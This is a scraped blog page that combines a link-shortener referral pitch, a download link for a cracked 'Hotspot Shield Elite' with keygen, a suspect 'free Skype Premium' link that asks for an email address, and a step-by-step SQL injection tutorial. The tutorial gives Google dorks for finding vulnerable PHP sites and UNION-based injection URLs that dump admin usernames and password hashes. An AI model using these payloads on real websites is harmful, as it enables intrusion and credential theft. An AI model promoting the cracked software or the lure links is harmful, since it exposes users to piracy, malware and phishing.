You are here because you love to<b> make money online</b> and I think I'm right.so what have you done before? you started a blog and now you're seeking for adsense but whats in it after getting adsense $0 in balance unless you click on your own ads :P (Never do it ).So here I come up with an old method but a new way to make money online easily without having a blog or a website even you don't need a domain name.So all you need is a PayPal account and a facebook account.Don't worry if you are not having PayPal because you can hold your payments as well as you can take it after a long period of time also no worries :).<br />
<br />
So the things I'm going to discuss here is Shorten Links..Hey Hey Hey don't get irritated its not the old methods like you start an account and share them then finally nothing right ? huh here the game is different , as I said I'll never ever recommend you to try things unless I give it a try.Here is a screen shot from my <span style="color: red;"><a href="https://shorte.st/ref/d2b4992947" target="_blank"><span style="color: red;"><b>Dashboard</b></span></a>.</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ2oRWuGVeAJQGsBbIG38obkg5lwGP56cLs2MVavw_h9OAstPho04_H2I2A6_RK6o_9ilgR1gDQrjridFLADq1R9f-vLA4HL_hV8590l-eaK-1Ebb_MRzny0OTMV6t_ATnReWm3dvj104/s1600/10157018_675978202469785_1648474131_n+copy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ2oRWuGVeAJQGsBbIG38obkg5lwGP56cLs2MVavw_h9OAstPho04_H2I2A6_RK6o_9ilgR1gDQrjridFLADq1R9f-vLA4HL_hV8590l-eaK-1Ebb_MRzny0OTMV6t_ATnReWm3dvj104/s1600/10157018_675978202469785_1648474131_n+copy.jpg" width="640" /></a></div>
<br />
<br />
<br />
According to me Inspiration First, ah now you can see the screenshot with proof.<br />
<br />
So, you are wondering now ,how I made this kinda money right? mm wait wait I'll say everything.You know that I'm a blogger and I'm busy with my clients so to do this work I hired my local friend who is sitting free. :P<br />
<br />
So Here Goes the Steps I've Done.<br />
<br />
+ I Signed Up Here to start a New Account in the above <a href="https://shorte.st/ref/d2b4992947" target="_blank"><span style="color: red;"><b>URL Shortening website</b></span></a>.<br />
+ After that I decided to Hire my friend because of the lack of time.(50/50 Share)<br />
+ I selected some of the Local Facebook Groups and Found 2 Groups with 100k Members Each<br />
+ I started selecting amazing videos from Youtube and Shorted the links<br />
+ After that I guided my friend and said him to do that Job<br />
+ He used to share instantly on all groups<br />
+ The Best thing is that the members of the groups are eager to watch that kinda videos and they          appriciated my friend.<br />
+ Fianlly after 20 Days of Instant Sharing We earned $71 and you can just think about my 30 days earning ;).<br />
<br />
According to my opinion the shortner I used is the best one in the industry paying around $1.30 /1000 Visits from India.You can see many other highly paying ones but all are fake  and scams so stick on this only.<br />
<br />
Advantages of Shorten Link Used By Me<br />
<br />
+ Low Payout Rate at $5<br />
+ Good eCPM and Click Value<br />
+ Easy Interface<br />
+ Trustable.<br />
+ You can see many payment proof at Google.<br />
<br />
So guys enjoy the earning if you want a good income online at least to manage our girl friends expense :).You can sign Up for Free Here :)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://shorte.st/ref/d2b4992947" target="_blank"><img border="0" height="116" src="http://www.kozevents.com/Assets/REG+NOW.jpg" width="320" /></a></div>
<br /></div>

Make money Without Blog.

Aha! The title looks spammy right? may be but you know Freelicenses and you know me and I will never ever recommend anyone anything without...

+ Read more »

Hotspot Shield Elite Full Version Free download.

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<h3 style="text-align: center;">
    Hotspot Shield Elite Full Version Crack + Patch + Keygen Free Download</h3>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqE70tQwLv16PoQ1uZOf9MVdTQ2gPp-CAra-ECTZ4kYzFDH4v_z-VX0fSNa39mim5fFkMhHi5YR1aLvEco3FBd16mZ4xOh6hHDOB79iuqr8zDsloSdCsASi5gF0Rp0AMLMgHPY8k9GaP8/s1600/27383.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqE70tQwLv16PoQ1uZOf9MVdTQ2gPp-CAra-ECTZ4kYzFDH4v_z-VX0fSNa39mim5fFkMhHi5YR1aLvEco3FBd16mZ4xOh6hHDOB79iuqr8zDsloSdCsASi5gF0Rp0AMLMgHPY8k9GaP8/s1600/27383.png" width="320" /></a></div>
<div style="text-align: left;">
<b><span style="color: red; font-family: Georgia, Times New Roman, serif;">Hotspot shield elite crack 2013</span></b> is known as <b><span style="color: red;">VPN</span></b> or proxy software used to unblock <a href="https://www.youtube.com/" target="_blank"><span style="background-color: white; color: #666666;">YouTube</span></a>, <a href="http://facebook.com/" style="background-color: white;" target="_blank">Facebook</a> and other blocked websites in Pakistan and in the whole world. It is not only a <b><span style="color: red;">proxy software</span></b> but also a tool to <span style="color: red;"><b>hide your identity</b></span>. Privacy is no more valid for internet users and it has been exposed many times. So, hotspot shield <b><span style="color: red;">protects your identity</span></b> and let you surf the websites anonymously. </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
<span style="color: orange;">How Hotspot Shiled Elite Crack Works?</span></h3>
<div>
Two versions of Hotspot shiled has been introduced in the market. Hotspot shield version is for those who don't want the annoying ads to open automatically. Any one can <b><span style="color: red;">buy Hotspot Shiled Elite</span></b> version from the official website of Hotspot but if you are poor enough and can't afford the price, there I am providing you <b><span style="color: red;">keygen</span></b> of Hostspot Shield Elite to activate it for full version.</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpmgAz_mntiC0fejGrnJVTdLcXxNk3g_9Mg_E-jsV02wAqgwpOrgeIYgFB4_aVuwvvrIQxonvJlwHVjfIDzCLpa2dpRuLK0ONw32rlR_CAeOptYQtphwZDGXFA_u2Q7vFHU8riEXuajSU/s1600/714587c9aa950a0e791408e2c2e05b1f1122_1HotspotShield-PC-Elite-3.09-DashBoard_540x366.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpmgAz_mntiC0fejGrnJVTdLcXxNk3g_9Mg_E-jsV02wAqgwpOrgeIYgFB4_aVuwvvrIQxonvJlwHVjfIDzCLpa2dpRuLK0ONw32rlR_CAeOptYQtphwZDGXFA_u2Q7vFHU8riEXuajSU/s1600/714587c9aa950a0e791408e2c2e05b1f1122_1HotspotShield-PC-Elite-3.09-DashBoard_540x366.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<b> Download via Mirror Creator- <span style="color: red;"><i><a href="http://sh.st/fu1kg" rel="nofollow" target="_blank"><span id="goog_266761827"></span>Click here</a><span id="goog_266761828"></span></i></span></b><br />
<b><span style="color: red;"><i><br /></i></span></b>
<b>Password :<span style="color: red;"> <i>In RAR</i></span></b><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
</div>

Hotspot Shield Elite Full Version Free download.

Hotspot Shield Elite Full Version Crack + Patch + Keygen Free Download Hotspot shield elite crack 2013 is known as VPN or...

+ Read more »

Get Skype Premium account

<div dir="ltr" style="text-align: left;" trbidi="on">
<h1 class="post-title entry-title" style="box-sizing: border-box; color: #333333; font-family: 'Droid Sans', Arial, Verdana, sans-serif; font-size: 19px; font-weight: normal; margin: 0px 0px 5px; padding: 0px;">
</h1>
<br />
<div class="labelatas" style="bottom: 5px; box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 11px; position: absolute; right: 5px;">
</div>
<div class="post-body entry-content" id="post-body-4562667727850457441" style="box-sizing: border-box; color: #333333; font-family: Verdana, Geneva, sans-serif; font-size: 12px; line-height: 1.6em; margin: 0px 0px 35px;">
<h2 style="box-sizing: border-box; font-family: 'Droid Sans', Arial, Verdana, sans-serif; font-size: 19px; font-weight: normal; margin: 0px 0px 5px; padding: 0px; text-align: center;">
Get Skype Premium account for 1 year</h2>
<ol style="box-sizing: border-box;"></ol>
<br style="box-sizing: border-box;" />
<ol style="box-sizing: border-box;">
<li style="box-sizing: border-box;"><span style="background-color: white; box-sizing: border-box; color: #37404e; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px;">Go To  this link </span><a href="http://sh.st/qNr9e" rel="nofollow nofollow" style="-webkit-transition: all 0.4s ease-in-out; background-color: white; box-sizing: border-box; color: #3b5998; cursor: pointer; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; text-decoration: none; transition: all 0.4s ease-in-out;" target="_blank">http://sh.st/qNr9e</a></li>
<li style="box-sizing: border-box;"><span style="background-color: white; box-sizing: border-box; color: #37404e; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px;"> enter your Email id of Skype.. and press "SEND"</span></li>
</ol>
<br style="box-sizing: border-box;" />
<div class="separator" style="box-sizing: border-box; clear: both; text-align: center;">
<a class="pirobox" data-pirobox="gallery" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMyiO0rpzkXrnrH7NE0-8Q8eWg3AdU5eu9nQk0E_dMF-Gvw6ZcumakSfcX7LKEeK8iifYvtL0hlmKeqXUMf9_LUbTtE1WHmpKxw1SXQVg8DAfbpMfPbtP2D871a_oasKbxLjXuzMnOJhc/s1600/Screenshot_3.jpg" imageanchor="1" style="-webkit-transition: all 0.4s ease-in-out; box-sizing: border-box; color: #62929e; margin-left: 1em; margin-right: 1em; text-decoration: none; transition: all 0.4s ease-in-out;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMyiO0rpzkXrnrH7NE0-8Q8eWg3AdU5eu9nQk0E_dMF-Gvw6ZcumakSfcX7LKEeK8iifYvtL0hlmKeqXUMf9_LUbTtE1WHmpKxw1SXQVg8DAfbpMfPbtP2D871a_oasKbxLjXuzMnOJhc/s400/Screenshot_3.jpg" style="-webkit-box-shadow: rgb(181, 181, 181) 0px 0px 2px; -webkit-transition: all 0.4s ease-in-out; background-color: white; border: 1px solid rgb(224, 224, 224); box-shadow: rgb(181, 181, 181) 0px 0px 2px; box-sizing: border-box; height: auto; max-width: 100%; padding: 5px; transition: all 0.4s ease-in-out;" width="400" /></a></div>
<div class="separator" style="box-sizing: border-box; clear: both; text-align: center;">
<br style="box-sizing: border-box;" /></div>
<br style="box-sizing: border-box;" />
<ul style="box-sizing: border-box;">
<li style="box-sizing: border-box;"><span style="box-sizing: border-box; color: #37404e; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px;"> Sing in you email account.. (gmail, yahoo, hotmail etc</span><span class="text_exposed_show" style="box-sizing: border-box; color: #37404e; display: inline; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px;">)</span></li>
</ul>
<br style="box-sizing: border-box;" />
<span class="text_exposed_show" style="background-color: white; box-sizing: border-box; color: #37404e; display: inline; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px;"><br style="box-sizing: border-box;" /></span>
<br />
<div class="separator" style="box-sizing: border-box; clear: both; text-align: center;">
<a class="pirobox" data-pirobox="gallery" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAKYHFXrFgX-36kV_mCpipin7C-n7mi_qXfQFBEum9XEScbKQeChyphenhyphenCjX_WIw3TBUUmLTMl3vTiYgiRGotCPMV6Va_RyfdjeeAmhNkcv8QwAFYPDWtC6wAq79M0h3cPLIiiaRIdj3GFHnE/s1600/Screenshot_4.jpg" imageanchor="1" style="-webkit-transition: all 0.4s ease-in-out; box-sizing: border-box; color: #62929e; margin-left: 1em; margin-right: 1em; text-decoration: none; transition: all 0.4s ease-in-out;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAKYHFXrFgX-36kV_mCpipin7C-n7mi_qXfQFBEum9XEScbKQeChyphenhyphenCjX_WIw3TBUUmLTMl3vTiYgiRGotCPMV6Va_RyfdjeeAmhNkcv8QwAFYPDWtC6wAq79M0h3cPLIiiaRIdj3GFHnE/s400/Screenshot_4.jpg" style="-webkit-box-shadow: rgb(181, 181, 181) 0px 0px 2px; -webkit-transition: all 0.4s ease-in-out; background-color: white; border: 1px solid rgb(224, 224, 224); box-shadow: rgb(181, 181, 181) 0px 0px 2px; box-sizing: border-box; height: auto; max-width: 100%; padding: 5px; transition: all 0.4s ease-in-out;" width="400" /></a></div>
<br style="box-sizing: border-box;" />
<span style="box-sizing: border-box; color: #37404e; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: xx-small;"><span style="box-sizing: border-box; line-height: 18px;"><br style="box-sizing: border-box;" /></span></span><span style="background-color: white; box-sizing: border-box; color: #37404e; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px;"> open the new skype email and follow the setp</span><br />
<div class="separator" style="box-sizing: border-box; clear: both; text-align: center;">
<a class="pirobox" data-pirobox="gallery" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUZkjpAyd29GNbhLyjZ7PU6T3XR_XM1DKM3qOV-98KFxK5BK5ghJQfjJ1B-v9pIWJU9yDqNGY0lbNGhhllxEhsBlHg6erythRaWy6tLk8VswiZHCgG2-F3OsE_9ZoN04LrnAw3ProQTQU/s1600/Screenshot_5.jpg" imageanchor="1" style="-webkit-transition: all 0.4s ease-in-out; box-sizing: border-box; color: #62929e; margin-left: 1em; margin-right: 1em; text-decoration: none; transition: all 0.4s ease-in-out;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUZkjpAyd29GNbhLyjZ7PU6T3XR_XM1DKM3qOV-98KFxK5BK5ghJQfjJ1B-v9pIWJU9yDqNGY0lbNGhhllxEhsBlHg6erythRaWy6tLk8VswiZHCgG2-F3OsE_9ZoN04LrnAw3ProQTQU/s400/Screenshot_5.jpg" style="-webkit-box-shadow: rgb(181, 181, 181) 0px 0px 2px; -webkit-transition: all 0.4s ease-in-out; background-color: white; border: 1px solid rgb(224, 224, 224); box-shadow: rgb(181, 181, 181) 0px 0px 2px; box-sizing: border-box; height: auto; max-width: 100%; padding: 5px; transition: all 0.4s ease-in-out;" width="400" /></a></div>
<span style="box-sizing: border-box; color: #37404e; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: xx-small;"><span style="box-sizing: border-box; line-height: 18px;"><br style="box-sizing: border-box;" /></span></span><span style="background-color: white; box-sizing: border-box; color: #37404e; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px;"> login your Skype form Website.</span><br />
<span style="background-color: white; box-sizing: border-box; color: #37404e; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 13px; line-height: 18px;">And see you Got €71,88 in your Skype...And your account is Premium..</span><br />
<div class="separator" style="box-sizing: border-box; clear: both; text-align: center;">
<a class="pirobox" data-pirobox="gallery" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiprtOd9jMM_fw7RPDKjM8vFEONyNxvHJdorldM-jxUIIswQYDbWIZQChdQyIK5JkwpiVxkKjvB6pJnWeZ7jBMDuQFwDlDkqq6ckCjG5oZiHfKWwA6hPRpwvTAOt6jgNZbREumh4Ryk_7s/s1600/1479139_197552747102800_741585914_n.jpg" imageanchor="1" style="-webkit-transition: all 0.4s ease-in-out; box-sizing: border-box; color: #62929e; margin-left: 1em; margin-right: 1em; text-decoration: none; transition: all 0.4s ease-in-out;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiprtOd9jMM_fw7RPDKjM8vFEONyNxvHJdorldM-jxUIIswQYDbWIZQChdQyIK5JkwpiVxkKjvB6pJnWeZ7jBMDuQFwDlDkqq6ckCjG5oZiHfKWwA6hPRpwvTAOt6jgNZbREumh4Ryk_7s/s400/1479139_197552747102800_741585914_n.jpg" style="-webkit-box-shadow: rgb(181, 181, 181) 0px 0px 2px; -webkit-transition: all 0.4s ease-in-out; background-color: white; border: 1px solid rgb(224, 224, 224); box-shadow: rgb(181, 181, 181) 0px 0px 2px; box-sizing: border-box; height: auto; max-width: 100%; padding: 5px; transition: all 0.4s ease-in-out;" width="400" /></a></div>
</div>
</div>

Get Skype Premium account

Get Skype Premium account for 1 year Go To this link http://sh.st/qNr9e enter your Email id of Skype.. and press "SEND...

+ Read more »

Website Hacking Using Sql Injection Maunal

<div dir="ltr" style="text-align: left;" trbidi="on">
<header style="background-color: white; color: #333333; font-family: 'Open Sans', OpenSansSemibold, Arial, sans-serif; font-size: 13px; line-height: 20px;"><div class="separator" style="clear: both; text-align: center;">
<a href="http://lastwatchdog.com/wp/wp-content/uploads/sql_img.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://lastwatchdog.com/wp/wp-content/uploads/sql_img.jpg" width="400" /></a></div>
<h1 itemprop="headline" style="color: inherit; font-size: 30px; line-height: 50px; margin: 0px 0px 5px; text-rendering: optimizelegibility;">
<br /></h1>
<h1 itemprop="headline" style="color: inherit; font-size: 30px; line-height: 50px; margin: 0px 0px 5px; text-rendering: optimizelegibility;">
Website Hacking Using Sql Injection Maunal</h1>
<hr style="border-bottom-color: rgb(255, 255, 255); border-bottom-style: solid; border-left-width: 0px; border-right-width: 0px; border-top-color: rgb(238, 238, 238); border-top-style: solid; margin: 20px 0px;" />
</header><span class="clearfix" style="-webkit-transition: all 0.3s linear; background-color: white; color: #333333; font-family: 'Open Sans', OpenSansSemibold, Arial, sans-serif; font-size: 13px; line-height: 20px; transition: all 0.3s linear;"></span><br />
<div class="post-entry" itemprop="articleBody" style="background-color: white; color: #333333; font-family: 'Open Sans', OpenSansSemibold, Arial, sans-serif; font-size: 13px; line-height: 22px;">
<div>
1). Search for a vulnerable site.</div>
<div>
=======================</div>
<div>
Highlight one then press ctrl+c then ctrl+v at google search engine.</div>
<div>
</div>
<div>
allinurl:index.php?id=</div>
<div>
allinurl:trainers.php?id=</div>
<div>
allinurl:buy.php?category=</div>
<div>
allinurl:article.php?ID=</div>
<div>
allinurl:play_old.php?id=</div>
<div>
allinurl:newsitem.php?num=</div>
<div>
allinurl:readnews.php?id=</div>
<div>
allinurl:top10.php?cat=</div>
<div>
allinurl:historialeer.php?num=</div>
<div>
allinurl:reagir.php?num=</div>
<div>
allinurl:Stray-Questions-View.php?num=</div>
<div>
allinurl:forum_bds.php?num=</div>
<div>
allinurl:game.php?id=</div>
<div>
allinurl:view_product.php?id=</div>
<div>
allinurl:newsone.php?id=</div>
<div>
allinurl:sw_comment.php?id=</div>
<div>
allinurl:news.php?id=</div>
<div>
allinurl:avd_start.php?avd=</div>
<div>
allinurl:event.php?id=</div>
<div>
allinurl:product-item.php?id=</div>
<div>
allinurl:sql.php?id=</div>
<div>
allinurl:news_view.php?id=</div>
<div>
allinurl:select_biblio.php?id=</div>
<div>
allinurl:humor.php?id=</div>
<div>
allinurl:aboutbook.php?id=</div>
<div>
allinurl:ogl_inet.php?ogl_id=</div>
<div>
allinurl:fiche_spectacle.php?id=</div>
<div>
allinurl:communique_detail.php?id=</div>
<div>
allinurl:sem.php3?id=</div>
<div>
allinurl:kategorie.php4?id=</div>
<div>
allinurl:news.php?id=</div>
<div>
allinurl:index.php?id=</div>
<div>
allinurl:faq2.php?id=</div>
<div>
allinurl:show_an.php?id=</div>
<div>
allinurl:preview.php?id=</div>
<div>
allinurl:loadpsb.php?id=</div>
<div>
allinurl:opinions.php?id=</div>
<div>
allinurl:spr.php?id=</div>
<div>
allinurl:pages.php?id=</div>
<div>
allinurl:announce.php?id=</div>
<div>
allinurl:clanek.php4?id=</div>
<div>
allinurl:participant.php?id=</div>
<div>
allinurl:download.php?id=</div>
<div>
allinurl:main.php?id=</div>
<div>
allinurl:review.php?id=</div>
<div>
allinurl:chappies.php?id=</div>
<div>
allinurl:read.php?id=</div>
<div>
allinurl:prod_detail.php?id=</div>
<div>
allinurl:viewphoto.php?id=</div>
<div>
allinurl:article.php?id=</div>
<div>
allinurl:person.php?id=</div>
<div>
allinurl:productinfo.php?id=</div>
<div>
allinurl:showimg.php?id=</div>
<div>
allinurl:view.php?id=</div>
<div>
allinurl:website.php?id=</div>
<div>
allinurl:hosting_info.php?id=</div>
<div>
allinurl:gallery.php?id=</div>
<div>
allinurl:rub.php?idr=</div>
<div>
allinurl:view_faq.php?id=</div>
<div>
allinurl:artikelinfo.php?id=</div>
<div>
allinurl:detail.php?ID=</div>
<div>
allinurl:index.php?=</div>
<div>
Ã¢â‚¬Â¦and this one is just pricelessÃ¢â‚¬Â¦</div>
<div>
Ã¢â‚¬Å“login: *Ã¢â‚¬Â Ã¢â‚¬Å“password= *Ã¢â‚¬Â filetypels</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://static-dbs1.dbsclients.com/dbswebsite.com/wp-content/uploads/2011/08/sql-injection2.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="187" src="http://static-dbs1.dbsclients.com/dbswebsite.com/wp-content/uploads/2011/08/sql-injection2.jpg" width="320" /></a></div>
<div>
<br /></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
2)Definitions:</div>
<div>
==========</div>
<div>
</div>
<div>
inurl: -> is a search parameter in google so that it searches for results in the site’s url.</div>
<div>
.php?5= -> is what i’m searching for in a url, SQL INJECTION works by adding a code after the = symbol. This is also commonly referred as a Dork.</div>
<div>
Dork definition: It’s the part in the site’s url that tells you that it can be vulnerable to a certain SQL injection. Let’s take this exploit for example:</div>
<div>
We will check it’s vulnerability by adding magic qoute (‘) at the end of the url.</div>
<div>
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login–</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
</div>
<div>
</div>
<div>
3) So the url will be like this:</div>
<div>
======================</div>
<div>
</div>
<div>
http://www.site.com/news_archive.php?id=5′</div>
<div>
And we hit enter and we got this result.</div>
<div>
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\’;</div>
<div>
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1)</div>
<div>
Database error: next_record called with no query pending.</div>
<div>
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1)</div>
<div>
If you got an error, some text missing or a blank page the site is vulnerable but not at all.</div>
<div>
Now we know that the site is vulnerable.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
</div>
<div>
</div>
<div>
</div>
<div>
4) Find the columns :</div>
<div>
===============</div>
<div>
</div>
<div>
The next step is find out how many columns the database contain</div>
<div>
To find it we use “order by” (without the qoute) and this string ” — ” (no qoute).</div>
<div>
It will look like this:</div>
<div>
http://www.site.com/news_archive.php?id=6 order by 1– (no error)</div>
<div>
http://www.site.com/news_archive.php?id=6 order by 2– (no error)</div>
<div>
http://www.site.com/news_archive.php?id=6 order by 3– (no error)</div>
<div>
we move a little higher. (it doesn’t matter)</div>
<div>
http://www.site.com/news_archive.php?id=6 order by 10– (no error)</div>
<div>
http://www.site.com/news_archive.php?id=6 order by 14– (no error)</div>
<div>
until we got an error:</div>
<div>
http://www.site.com/news_archive.php?id=6 order by 15– (we got an error)</div>
<div>
now we got an error on this column:it will lok like this.</div>
<div>
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15–;</div>
<div>
mySQL Error: 1054 (Unknown column ’15′ in ‘order clause’)</div>
<div>
Database error: next_record called with no query pending.</div>
<div>
mySQL Error: 1054 (Unknown column ’15′ in ‘order clause’)</div>
<div>
this mean the database contain only 14 columns</div>
<div>
</div>
<div>
</div>
<div>
5)Union select :</div>
<div>
===========</div>
<div>
</div>
<div>
Now use “-” (negative quote) and union select statement.</div>
<div>
using this we can select more data in one sql statement.</div>
<div>
Look like this:</div>
<div>
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14–</div>
<div>
we hit enter.</div>
<div>
numbers appears..</div>
<div>
Like this:</div>
<div>
6</div>
<div>
, 5</div>
<div>
8</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
</div>
<div>
</div>
<div>
6) Check MYSQL Version</div>
<div>
====================</div>
<div>
</div>
<div>
Now we will check it’s MYSQL VERSION. We will add @@version on the numbers appear on the previous step.</div>
<div>
lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.</div>
<div>
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14–</div>
<div>
and you will get a result like this:</div>
<div>
6</div>
<div>
, 5</div>
<div>
5.1.32 <–this is the version</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
</div>
<div>
</div>
<div>
7) Getting Table Name.</div>
<div>
=================</div>
<div>
</div>
<div>
We use group_concat(table_name).</div>
<div>
replace @@version with group_concat(table_name)</div>
<div>
and look like this:</div>
<div>
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14–</div>
<div>
were not done already: (don’t hit enter)</div>
<div>
between number 14 and this “–” (quote) insert this:</div>
<div>
+from+information_schema.tables+whe</div>
<div>
re+table_schema=database()–</div>
<div>
it will look like this:</div>
<div>
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()–</div>
<div>
we hit enter and got this result:</div>
<div>
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhot o,active_sessions_split,auth_u ser_md5</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
</div>
<div>
</div>
<div>
8) Column Name :</div>
<div>
=============</div>
<div>
</div>
<div>
Now we’re done on TABLE NAME, we move on to COLUMN NAME.</div>
<div>
use this string group_concat(column_name)</div>
<div>
replace group_concat(table_name) to group_concat(column_name).</div>
<div>
but before that we must choose one column. i choose auth_user_md5 because this is must or what we want.</div>
<div>
for better result we need to hex auth_user_md5.</div>
<div>
Go to this Link: TRANSLATOR, BINARY</div>
<div>
p</div>
<div>
aste auth_user_md5 to the text box and click encode.</div>
<div>
now we get the hex of auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35</div>
<div>
before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435</div>
<div>
Now replace group_concat(table_name) to group_concat(column_name).</div>
<div>
like this:</div>
<div>
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()–</div>
<div>
replace also +from+information_schema.tables+where+table_schema =database()–</div>
<div>
to</div>
<div>
+from+information_schema.columns+where+table_name= 0x617574685f757365725f6d6435–</div>
<div>
(The yellow letter and numbers is the auth_user_md5 hex we encoded)</div>
<div>
Note: always add 0x before the hex. Like above.</div>
<div>
Here is the result:</div>
<div>
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_nam e=0x617574685f757365725f6d6435–</div>
<div>
Now hit enter: and you got result like this.</div>
<div>
UserID,Username,Password,Perms,FirstName,MiddleNam e,LastName,Position,EmailAddre ss,ContactNumbers,DateCreated,CreatedBy,DateModifi ed,ModifiedBy,Status</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
</div>
<div>
</div>
<div>
9) Main part :</div>
<div>
===========</div>
<div>
</div>
<div>
We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..</div>
<div>
Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,P</div>
<div>
assword,0x3a,Perms,0x3a,FirstName,0x3a,M iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAd dress,0x3a,ContactNumbers,0x3a ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a ,ModifiedBy,0x3aStatus)</div>
<div>
but i prefer to do this one group_concat(Username,0x3a,Password) for less effort.</div>
<div>
and replace also information_schema.columns+where+table_name=0×6175 74685f757365725f6d6435– to +from+auth_user_md5–</div>
<div>
617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.</div>
<div>
Result look like this:</div>
<div>
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5–</div>
<div>
i hit enter we got this:</div>
<div>
admin username: k2admin / admin</div>
<div>
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
